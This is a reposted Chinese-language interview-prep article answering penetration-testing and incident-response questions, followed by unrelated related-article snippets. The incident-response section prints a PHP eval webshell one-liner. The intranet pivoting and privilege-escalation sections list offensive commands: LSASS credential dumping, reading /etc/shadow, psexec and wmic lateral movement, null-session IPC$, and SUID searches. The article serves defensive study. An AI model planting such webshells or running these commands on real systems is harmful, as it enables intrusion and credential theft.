2025年滲透測試面試題總結-2025年HW(護網面試) 29(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

?2025年HW(護網面試) 29

1. 樣本分析思路

2. Linux GDB分析樣本示例

3. 應急案例:WebShell后門排查

4. 日志審計重點

5. 命令被替換檢測方法

6. RPM校驗參數

7. APT研究經驗

8. 常見漏洞分析方向

9. 內網漫游思路

10. 橫向移動與IPC$

11. 權限提升方法

防御建議

?2025年HW(護網面試) 29

1、如何做的樣本分析,思路是什么
2、如何用linuxgdb分析一個簡單樣本
3、再舉一個你的其他應急的例子(我舉的是挖礦病毒)
4、日志你看的是什么日志,web服務器日志嘛
5、某些命令被替換了,如何發現
6、rpm有個參數就可以校驗命令是否被替換,是什么
7、是否做過APT相關的研究
8、如何分析windows,linux,web一些常見的漏洞
9、內網突破到內網漫游的思路
10、如何橫向、IPC了解過嘛,橫向原理
11、權限提升(windows,linux)

1. 樣本分析思路

方法論框架

mermaidgraph LR A[靜態分析] --> A1[文件格式識別] A --> A2[字符串提取] A --> A3[熵值檢測加殼] B[動態分析] --> B1[沙箱行為監控] B --> B2[API調用跟蹤] C[關聯分析] --> C1[威脅情報匹配] C --> C2[攻擊鏈重構]

關鍵步驟

  • 靜態分析:使用filestringsbinwalk識別文件結構;PEiD查殼;YARA規則掃描特征
  • 動態分析:在隔離環境中運行,用Sysinternals Suite(Windows)或strace(Linux)監控進程/注冊表/網絡
  • 內存取證Volatility提取注入代碼或隱藏進程
  • 逆向工程:IDA Pro/Ghidra反編譯關鍵函數

2. Linux GDB分析樣本示例

場景:分析ELF文件堆棧溢出漏洞

bash# 編譯時加入調試信息 gcc -g -fno-stack-protector vuln.c -o vuln # GDB調試步驟 gdb ./vuln (gdb) break main # 主函數斷點 (gdb) run < payload # 觸發漏洞 (gdb) x/100x $esp # 檢查棧內存 (gdb) info registers # 查看寄存器值 (gdb) backtrace # 崩潰調用棧 (gdb) disassemble # 反匯編當前函數

關鍵技巧

  • checksec檢查保護機制(ASLR/NX/CANARY)
  • pattern create & pattern offset定位溢出點

3. 應急案例:WebShell后門排查

攻擊鏈

SQL注入 → 寫入WebShell → 內網掃描 → 數據外傳  

響應過程

  1. 檢測
    • Web日志發現/uploads/.test.php 異常訪問(HTTP 200 for POST請求)
    • 文件內容:<?php @eval($_POST['cmd']);?>
  2. 遏制
    • 隔離服務器,禁用Apache賬戶網絡權限
  3. 溯源
    • 日志關聯:攻擊IP來自TOR出口節點
    • 文件創建時間匹配此前SQL注入日志
  4. 加固
    • 目錄禁止執行權限:chmod -R o-x /var/www/uploads
    • 部署WAF規則攔截eval(等危險函數

4. 日志審計重點

核心日志類型

日志類型分析工具關鍵事件
Web訪問日志GoAccess/AWStats異常路徑訪問、高頻500錯誤
系統認證日志journalctl/rsyslog非辦公時間登錄、root暴力破解
進程執行日志auditd (Linux)未知二進制執行、敏感命令調用
PowerShell日志Windows事件4662混淆代碼執行、遠程下載

5. 命令被替換檢測方法

Linux檢測步驟

  1. HASH校驗
    bash# 查詢系統命令的原始HASH rpm -Vf /bin/ls # 輸出示例:S.5....T. /bin/ls (HASH不匹配)
  2. 時間戳比對
    basstat /bin/netstat # 查看修改時間 ls -l /bin # 對比同目錄文件時間
  3. 完整性工具
    • aide:創建數據庫定期校驗
    • tripwire:商業級文件監控

Windows檢測

  • sigcheck -v -a C:\Windows\System32\cmd.exe (Sysinternals工具)

6. RPM校驗參數

命令

bashrpm -Va # 校驗所有已安裝包 rpm -Vf /usr/bin/ssh # 校驗指定命令 

輸出標識解析

  • S:文件大小改變
  • 5:MD5校驗失敗
  • T:修改時間變化
  • U:用戶權限變更

7. APT研究經驗

分析重點

  • 初始入侵:魚郵件附件(CVE-2017-11882)、水坑攻擊
  • 持久化:Windows計劃任務、Linux crontab
  • C2通信
    • DNS隧道(檢測異常NXDOMAIN請求)
    • HTTPS證書不匹配(JA3指紋異常)
  • 數據滲出:圖片隱寫、Cloud Storage API濫用

工具鏈

  • 網絡流量:Suricata + ELK
  • 端點行為:Osquery + Kolide Fleet
  • 內存分析:Rekall

8. 常見漏洞分析方向

跨平臺漏洞矩陣

平臺漏洞類型分析工具
WebSQL注入/XSSBurp Suite, SQLMap
Linux內核提權(CVE-2021-4034)checksec, lynis
Windows永恒之藍(MS17-010)Nessus, Impacket
云環境桶策略錯誤ScoutSuite, Pacu

9. 內網漫游思路

滲透路徑

mermaidgraph TB A[邊界突破] --> B[主機發現] B --> C[憑證竊取] C --> D[橫向移動] D --> E[權限提升] E --> F[域控奪取]

技術細節

  • 主機發現nmap -sn 192.168.1.0/24
  • 憑證竊取
    • Windows:Mimikatz抓取LSASS內存
    • Linux:搜索.bash_history/etc/shadow
  • 橫向移動
    • SMB協議:psexec.py admin@192.168.1.10
    • WMI遠程執行:wmic /node:192.168.1.2 process call create "cmd.exe"

10. 橫向移動與IPC$

IPC$原理

  • 通過空會話(Null Session)訪問遠程主機的命名管道
  • 利用方式:
    bashnet use \\192.168.1.5\IPC$ "" /u:"" # 建立空連接 enum4linux -a 192.168.1.5 # 枚舉信息 

防御措施

  • 組策略禁用匿名枚舉:RestrictAnonymous=1
  • 防火墻阻斷135-139/445端口

11. 權限提升方法

Windows提權

  • 服務路徑漏洞
    powershellsc qc VulnSvc # 檢查可寫服務路徑 
  • 令牌竊取incognito.exe 模擬SYSTEM令牌
  • AlwaysInstallElevated:利用MSI安裝包提權

Linux提權

  • SUID濫用
    bashfind / -perm -4000 2>/dev/null # 查找SUID文件 
  • 內核漏洞dirtypipe(CVE-2022-0847)利用腳本
  • sudo配置錯誤sudo -l 查看可免密執行命令

防御建議

  1. Linux:定期運行rpm -Va校驗系統文件
  2. Windows:啟用LSA保護防止Mimikatz
  3. 日志統一:部署SIEM集中分析(如Splunk/QRadar)
  4. 最小權限:所有服務使用低權賬戶運行

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/87781.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/87781.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/87781.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

動態編程入門第二節:委托與事件 - Unity 開發者的高級回調與通信藝術

動態編程入門第一節&#xff1a;C# 反射 - Unity 開發者的超級工具箱 動態編程入門第二節&#xff1a;委托與事件 - Unity 開發者的高級回調與通信藝術 上次我們聊了 C# 反射&#xff0c;它讓程序擁有了在運行時“看清自己”的能力。但光能看清還不夠&#xff0c;我們還需要讓…

降低網絡安全中的人為風險:以人為本的路徑

有效降低網絡安全中的人為風險&#xff0c;關鍵在于采取以人為本的方法。這種方法的核心在于通過高效的培訓和實踐&#xff0c;使員工掌握安全知識、踐行安全行為&#xff0c;并最終培育出安全且相互支持的文化氛圍。 誠然&#xff0c;技術和政策必須為良好的安全行為提供支持、…

opencv裁剪和編譯

opencv裁剪和編譯 0. 準備工作 0.1 下載和安裝Eigen 地址 https://eigen.tuxfamily.org/index.php?titleMain_Page對于opencv編譯&#xff0c;需要增加EIGEN_INCLUDE_PATH和開啟WITH_EIGEN -DWITH_EIGENON -DEIGEN_INCLUDE_PATH./3rd/eigen-3.4.01. 實際腳本 編譯腳本如下: ch…

小白成長之路-mysql數據基礎(三)

文章目錄一、主從復制二、案例總結一、主從復制 1、master開啟二進制日志記錄2、slave開啟IO進程&#xff0c;從master中讀取二進制日志并寫入slave的中繼日志3、slave開啟SQL進程&#xff0c;從中繼日志中讀取二進制日志并進行重放4、最終&#xff0c;達到slave與master中數據…

通過 Windows 共享文件夾 + 手機訪問(SMB協議)如何實現

通過 Windows 共享文件夾 手機訪問&#xff08;SMB協議&#xff09; 實現 PC 和安卓手機局域網文件共享&#xff0c;具體步驟如下&#xff1a; &#x1f4cc; 前置條件 電腦和手機連接同一局域網&#xff08;同一個Wi-Fi或路由器&#xff09;。關閉防火墻或放行SMB端口&#…

【Python3教程】Python3高級篇之正則表達式

博主介紹:?全網粉絲23W+,CSDN博客專家、Java領域優質創作者,掘金/華為云/阿里云/InfoQ等平臺優質作者、專注于Java技術領域? 技術范圍:SpringBoot、SpringCloud、Vue、SSM、HTML、Nodejs、Python、MySQL、PostgreSQL、大數據、物聯網、機器學習等設計與開發。 感興趣的可…

Redis--黑馬點評--達人探店功能實現詳解

達人探店發布探店筆記探店筆記類似于點評網站的評價&#xff0c;往往是圖文結合&#xff0c;對應的表有兩個&#xff1a;tb_blog&#xff1a;探店筆記表&#xff0c;包含筆記中的標題、文字、圖片等tb_blog_comments&#xff1a;其他用戶對探店筆記的評價tb_blog表結構如下&…

一探 3D 互動展廳的神奇構造?

3D 互動展廳的神奇之處&#xff0c;離不開一系列先進技術的強力支撐 。其中&#xff0c;VR(虛擬現實)技術無疑是核心亮點之一。通過佩戴 VR 設備&#xff0c;觀眾仿佛被瞬間 “傳送” 到一個全新的世界&#xff0c;能夠全身心地沉浸其中&#xff0c;360 度無死角地觀察周圍的一…

C++ 網絡編程(15) 利用asio協程搭建異步服務器

&#x1f680; [協程與異步服務器實戰]&#xff1a;[C20協程原理與Boost.Asio異步服務器開發] &#x1f4c5; 更新時間&#xff1a;2025年07月05日 &#x1f3f7;? 標簽&#xff1a;C20 | 協程 | Boost.Asio | 異步編程 | 網絡服務器 文章目錄前言一、什么是協程&#xff1f;二…

【Java21】在spring boot中使用虛擬線程

文章目錄 0.環境說明1.原理解析2.spring boot的方案3.注意事項&#xff08;施工中&#xff0c;歡迎補充&#xff09; 前置知識 虛擬線程VT&#xff08;Virtual Thread&#xff09; 0.環境說明 用于驗證的版本&#xff1a; spring boot: 3.3.3jdk: OpenJDK 21.0.5 spring boot…

利器:NPM和YARN及其他

文章目錄**1. 安裝 Yarn&#xff08;推薦方法&#xff09;****2. 驗證安裝****3. 常見問題及解決方法****① 權限不足&#xff08;Error: EPERM&#xff09;****② 網絡問題&#xff08;連接超時或下載失敗&#xff09;****③ 環境變量未正確配置****4. 替代安裝方法&#xff0…

跨平臺直播美顏SDK集成實錄:Android/iOS如何適配貼紙功能

眾所周知&#xff0c;直播平臺與短視頻平臺的貼紙功能不僅是用戶表達個性的方式&#xff0c;更是平臺提高用戶粘性和互動轉化的法寶。 可問題來了&#xff1a;如何讓一個貼紙功能&#xff0c;在Android和iOS兩大平臺上表現一致、運行流暢、加載穩定&#xff1f;這背后&#xff…

JavaWeb(蒼穹外賣)--學習筆記04(前端:HTML,CSS,JavaScript)

前言 本片文章是學習B站黑馬程序員蒼穹外賣的學習筆記。因為最近期末周&#xff0c;一直在應付考試所以就學的很少&#xff0c;恰好視頻中在講Nginx反向代理和負載均衡&#xff08;寫著對前端的內容做一個復習&#xff09; 概述&#xff1a; 1.web前端主要由三部分組成&…

智能學號抽取系統 V5.4.3.2 —— Vue.js 實現的多功能課堂隨機抽簽工具

智能學號抽取系統 V5.4.3.2 —— Vue.js 實現的多功能課堂隨機抽簽工具 在教學或會議場景中&#xff0c;我們經常需要隨機抽取一個或多個學號/編號來決定發言者、答題者或者參與者。為了提高效率和公平性&#xff0c;我們可以使用一些智能化的小工具來實現這一過程。 今天介紹…

從0開始學習R語言--Day39--Spearman 秩相關

在非參數統計中&#xff0c;不看數據的實際數值&#xff0c;單純比較兩組變量的值的排名是通用的基本方法&#xff0c;但在客觀數據中&#xff0c;很多變量的關系都是非線性的&#xff0c;其他的方法不是對樣本數據的大小和線性有要求&#xff0c;就是只能對比數據的差異性&…

WSL - Linux 安裝 Anaconda3-2025.06-0 詳細教程 [WSL 分發版均適用]

一、檢查系統狀態 安裝前先確認 WSL - Linxu 已正常啟動&#xff08;比如 Ubuntu&#xff09;&#xff0c;網絡連接穩定&#xff0c;并且系統磁盤有足夠空間&#xff0c;一般建議預留至少 5GB 以上的可用空間&#xff0c;避免因空間不足導致安裝失敗。 二、下載安裝包 Anacond…

熱血三國建筑攻略表格

<!DOCTYPE html> <html lang"zh-CN"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>熱血三國建筑攻略表格</title><style>…

SpringBoot+MySQL醫院掛號系統源碼

概述 基于SpringBootMySQL開發的醫院掛號系統完整源碼&#xff0c;該系統功能完善&#xff0c;包含從患者掛號到醫生管理的全流程解決方案&#xff0c;采用主流技術棧開發&#xff0c;代碼規范易于二次開發。 主要內容 系統包含完整的前后臺功能模塊&#xff1a; ??前臺功…

Linux系統之MySQL數據庫基礎

目錄 一、概述 數據庫概念 數據庫的類型 關系型數據庫模型 關系數據庫相關概念 二、安裝 1、mariadb安裝 2、mysql安裝 3、啟動并開機自啟 4、本地連接&#xff08;本地登錄&#xff09; 三、mysqld數據庫配置與命令 yum安裝后生成的目錄 mysqld服務器的啟動腳本 …

MySQL--InnoDB存儲引擎--頁結構

目錄 一、頁的大小 二、頁的分類 三、頁頭和頁尾 3.1 頁頭--File Header 3.2 頁尾--File Trailer 3.3 LSN 四、數據行 五、頁中數據的查詢 六、事務和索引在頁中的記錄 一、頁的大小 前面介紹了每個數據頁默認大小為16KB&#xff0c;是操作系統“數據塊” 4KB 的整數倍…